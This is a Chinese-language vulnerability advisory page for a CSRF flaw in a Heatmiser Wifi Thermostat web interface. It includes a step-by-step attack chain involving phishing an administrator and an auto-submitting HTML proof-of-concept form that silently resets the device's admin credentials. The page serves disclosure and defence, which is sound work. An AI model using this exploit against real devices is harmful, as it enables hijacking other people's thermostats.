CVE-2019-25708 CVSS 4.3 中危

CVE-2019-25708 Heatmiser恒温器CSRF漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25708

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Heatmiser Wifi Thermostat

漏洞概述

Heatmiser Wifi Thermostat 1.7版本存在跨站请求伪造（CSRF）漏洞。由于设备Web管理界面缺乏对关键操作的请求来源验证，攻击者可诱导已登录的管理员用户访问精心构造的恶意网页。一旦用户访问，其浏览器将在后台静默发送包含恶意参数的请求至设备，导致管理员账号和密码在用户毫不知情的情况下被非法篡改。此漏洞可能导致攻击者完全接管设备控制权，造成严重的物联网安全风险。

技术细节

该漏洞的核心在于Heatmiser Wifi Thermostat在处理用户凭证修改请求时，未实施有效的跨站请求伪造防护机制（如CSRF Token或Referer头部检查）。攻击者可以构建一个恶意的HTML页面，其中包含一个自动提交的表单。该表单的action属性指向受影响设备的`networkSetup.htm`接口，并预设`usnm`（用户名）、`usps`（密码）及`cfps`（确认密码）等参数。当拥有管理员权限的受害者浏览器加载此页面时，由于浏览器会自动附带上该域名的Cookie，设备会将该请求误认为是合法的管理员操作。因此，攻击者无需知晓原始密码即可重置管理员账户，从而绕过认证机制控制设备。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别网络中的Heatmiser Wifi Thermostat设备IP地址。

STEP 2

2. 构造Payload

攻击者编写包含恶意HTML表单的网页，表单指向设备的networkSetup.htm接口，预设新的管理员账号密码。

STEP 3

3. 社会工程学攻击

攻击者通过邮件或即时通讯工具将恶意链接发送给拥有设备管理权限的用户，诱导其点击。

STEP 4

4. 执行CSRF攻击

管理员用户点击链接并在已登录状态下浏览页面，浏览器自动携带Cookie向设备发送修改凭据的请求。

STEP 5

5. 获取控制权

设备验证通过并更新管理员密码，攻击者随后可使用新密码登录设备，获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2019-25708 -->
<!-- Targeting Heatmiser Wifi Thermostat -->
<html>
  <body>
    <form action="http://<target_ip>/networkSetup.htm" method="POST">
      <input type="hidden" name="usnm" value="attacker" />
      <input type="hidden" name="usps" value="newpassword" />
      <input type="hidden" name="cfps" value="newpassword" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form to trigger the vulnerability
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Heatmiser Wifi Thermostat 1.7

防御指南

临时缓解措施

建议用户不要在登录设备管理后台时浏览其他未知网站。在厂商发布补丁前，可通过更改本地hosts文件或使用防火墙规则，严格限制对设备Web管理界面的访问来源，仅允许特定的管理终端IP进行连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表